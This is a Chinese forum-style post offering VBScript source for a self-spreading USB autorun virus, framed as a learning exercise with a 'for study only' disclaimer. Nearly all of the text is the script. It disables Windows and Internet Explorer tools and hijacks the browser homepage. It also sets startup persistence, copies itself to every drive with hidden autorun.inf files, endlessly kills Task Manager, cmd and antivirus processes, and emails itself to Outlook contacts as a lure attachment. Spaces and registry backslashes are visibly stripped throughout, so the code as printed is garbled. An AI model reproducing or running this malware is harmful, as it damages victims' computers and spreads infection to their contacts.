使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到CDE和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒和部分熊猫烧香功能,本人能力有限,只能模拟这样的病毒了,声明,本人模拟这个病毒,全是为了学习和技术，切忌不要搞破坏，如果有人用本人代码破坏,后果自负onerrorresumenext

dimfso,wsh,myfile,ws,pp,fsoFolder

setwsh=wscript.createobject("wscript.shell")

setfso=wscript.createobject("scripting.filesystemobject")

setmyfile=fso.GetFile(wscript.scriptfullname)

'修改注册表（开始菜单里面的东西和IE各项设置)

wsh.Regwrite"HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue",0,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerRestrictionsNoFileOpen",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelAdvanced",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelCacheInternet",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelAutoConfig",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelHomePage",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelHistory",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelConnwizAdminLock",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftInternetExplorerMainStartPage","http://ruanji03.ys168.com"

wsh.Regwrite"HKCUSoftwareMicrosoftInternetExplorerMainSearchPage","http://ruanji03.ys168.com"

wsh.Regwrite"HKCUSoftwareMicrosoftInternetExplorerMainDefault_Page_URL","http://ruanji03.ys168.com"

wsh.Regwrite"HKCUSoftwareMicrosoftInternetExplorerMainDefault_Search_URL","http://ruanji03.ys168.com"

wsh.Regwrite"HKEY_USERS.DEFAULTSoftwareMicrosoftInternetExplorerMainStartPage","http://ruanji03.ys168.com"

wsh.Regwrite"HKEY_USERS.DEFAULTSoftwareMicrosoftInternetExplorerMainDefault_Page_URL","http://ruanji03.ys168.com"

wsh.Regwrite"HKEY_USERS.DEFAULTSoftwareMicrosoftInternetExplorerMainDefault_Search_URL","http://ruanji03.ys168.com"

wsh.Regwrite"HKEY_USERS.DEFAULTSoftwareMicrosoftInternetExplorerMainSearchPage","http://ruanji03.ys168.com"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelHomePage",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelSecurityTab",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerControlPanelResetWebSettings",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerRestrictionsNoViewSource",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwarePoliciesMicrosoftInternetExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD"

wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","c:NYboy.vbs"

wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry",""

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerStartMenuLogOff",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSMHelp",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoNetHood",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWinKeys",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsMenu",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind","1","REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWindowsUpdate",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskbar",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFavoritesMenu",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsHistory",1,"REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools","1","REG_DWORD"

wsh.Regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD"

'使用户不能通过双击打开硬盘，这里还可以修改为使其不能通过双击打开文件夹，同理，不赘续

wsh.Regwrite"HKLMSOFTWAREClassesDriveshellautocommand","C:NYboy.bat'%1'"

wsh.Regwrite"HKCRDriveshell","auto"

wsh.Regwrite"HKCRDriveshellautocommand","C:NYboy.bat'%1'"

wsh.Regwrite"HKLMSOFTWAREClassesDirectoryshell","auto"

wsh.Regwrite"HKCRDirectoryshellautocommand","C:NYboy.bat'%1'"

wsh.Regwrite"HKLMSOFTWAREClassesDirectoryshellautocommand","C:NYboy.bat'%1'"

'修改默认文件图标这里可以换成可爱的熊猫哦

wsh.Regwrite"HKCRexefileDefaultIcon","c:1.ico"

wsh.Regwrite"HKCRtxtfileDefaultIcon","c:1.ico"

wsh.Regwrite"HKCRdllfileDefaultIcon","c:1.ico"

wsh.Regwrite"HKCRbatfileDefaultIcon","c:1.ico"

wsh.Regwrite"HKCRinifileDefaultIcon","c:1.ico"

wsh.Regwrite"HKLMSOFTWAREClassesexefileDefaultIcon","c:1.ico"

wsh.Regwrite"HKLMSOFTWAREClassestxtfileDefaultIcon","c:1.ico"

wsh.Regwrite"HKLMSOFTWAREClassesdllfileDefaultIcon","c:1.ico"

wsh.Regwrite"HKLMSOFTWAREClassesbatfileDefaultIcon","c:1.ico"

wsh.Regwrite"HKLMSOFTWAREClassesinifileDefaultIcon","c:1.ico"

wsh.Regwrite"HKLMSoftwareCLASSES.reg","txtfile"

wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","你好啊，大兵和你开个小小的玩笑"

wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","你已经中毒了，赶快杀毒或者与QQ252287438联系"

'复制自身到C,D,E,F,U盘

myfile.copy"c:"

myfile.copy"D:"

myfile.copy"E:"

myfile.copy"F:"

myfile.copy"I:"

myfile.attributes=34

'定义Autorun.inf的内容这个就是u盘病毒必须的代码部分这里可以简单写

Iffso.FileExists("C:autorun.inf")Then

SetobjFolder=fso.GetFile("C:autorun.inf")

Else

wsh.run"cmd/cecho[AutoRun]>>C:autorun.inf"_

&"&&echoopen=NYboy.bat>>C:autorun.inf"_

&"&&echoshellexecute=NYboy.bat>>C:autorun.inf"_

&"&&echoshellAutocommand=NYboy.bat>>C:autorun.inf"_

&"&&echoshell=Auto>>C:autorun.inf"_

&"&&attrib+h+s+rC:autorun.inf"

setautobatc=fso.createtextfile("c:NYboy.bat",1,ture)

autobatc.writeline("NYboy.vbs")

EndIf

Iffso.FileExists("D:autorun.inf")Then

SetobjFolder=fso.GetFile("D:autorun.inf")

Else

wsh.run"cmd/cecho[AutoRun]>>D:autorun.inf"_

&"&&echoopen=NYboy.bat>>D:autorun.inf"_

&"&&echoshellexecute=NYboy.bat>>D:autorun.inf"_

&"&&echoshellAutocommand=NYboy.bat>>D:autorun.inf"_

&"&&echoshell=Auto>>D:autorun.inf"_

&"&&attrib+h+s+rD:autorun.inf"

setautobatd=fso.createtextfile("D:NYboy.bat",1,ture)

autobatd.writeline("NYboy.vbs")

EndIf

Iffso.FileExists("E:autorun.inf")Then

SetobjFolder=fso.GetFile("E:autorun.inf")

Else

wsh.run"cmd/cecho[AutoRun]>>E:autorun.inf"_

&"&&echoopen=NYboy.bat>>E:autorun.inf"_

&"&&echoshellexecute=NYboy.bat>>E:autorun.inf"_

&"&&echoshellAutocommand=NYboy.bat>>E:autorun.inf"_

&"&&echoshell=Auto>>E:autorun.inf"_

&"&&attrib+h+s+rE:autorun.inf"

setautobate=fso.createtextfile("E:NYboy.bat",1,ture)

autobate.writeline("NYboy.vbs")

EndIf

Iffso.FileExists("F:autorun.inf")Then

SetobjFolder=fso.GetFile("F:autorun.inf")

Else

wsh.run"cmd/cecho[AutoRun]>>F:autorun.inf"_

&"&&echoopen=NYboy.bat>>F:autorun.inf"_

&"&&echoshellexecute=NYboy.bat>>F:autorun.inf"_

&"&&echoshellAutocommand=NYboy.bat>>F:autorun.inf"_

&"&&echoshell=Auto>>F:autorun.inf"_

&"&&attrib+h+s+rF:autorun.inf"

setautobatf=fso.createtextfile("F:NYboy.bat",1,ture)

autobatf.writeline("NYboy.vbs")

EndIf

Iffso.FileExists("I:autorun.inf")Then

SetobjFolder=fso.GetFile("I:autorun.inf")

Else

wsh.run"cmd/cecho[AutoRun]>>I:autorun.inf"_

&"&&echoopen=NYboy.bat>>I:autorun.inf"_

&"&&echoshellexecute=NYboy.bat>>I:autorun.inf"_

&"&&echoshellAutocommand=NYboy.bat>>I:autorun.inf"_

&"&&echoshell=Auto>>I:autorun.inf"_

&"&&attrib+h+s+rI:autorun.inf"

setautobatf=fso.createtextfile("I:NYboy.bat",1,ture)

autobatf.writeline("NYboy.vbs")

EndIf

'设置病毒体属性为系统只读隐藏

wsh.run"cmd/cattrib+h+s+rC:NYboy.bat"_

&"&&attrib+h+s+rD:NYboy.bat"_

&"&&attrib+h+s+rE:NYboy.bat"_

&"&&attrib+h+s+rF:NYboy.bat"_

&"&&attrib+h+s+rI:NYboy.bat"

'强制结束某些进程,比如QQ，记事本，网页，批处理文件，卡巴，realplay等进程,运行后打不开这些文件

do

setws=getobject("winmgmts:.rootcimv2")

setpp=ws.execquery("select*fromwin32_processwherename='taskmgr.exe'orName='QQ.exe'orName='notepad.exe'orName='IEXPLORE.exe'orName='cmd.exe'orName='avp.exe'orName='winRAR.exe'orName='realplay.exe'orName='WINWORD.exe'")

foreachiinpp

i.terminate()

wscript.sleep100

next

loop

'使病毒可以靠邮件传播

Setol=CreateObject("Outlook.Application")

OnErrorResumeNext

Forx=1To5

SetMail=ol.CreateItem(0)

Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)

Mail.Subject="今晚你来吗？"

Mail.Body="朋友你好：您的朋友给您发来了热情的邀请。具体情况请阅读随信附件，祝您好运！QQ交友频道"

Mail.Attachments.Add("c:NYboy.vbs")

Mail.Send

Next

ol.Quit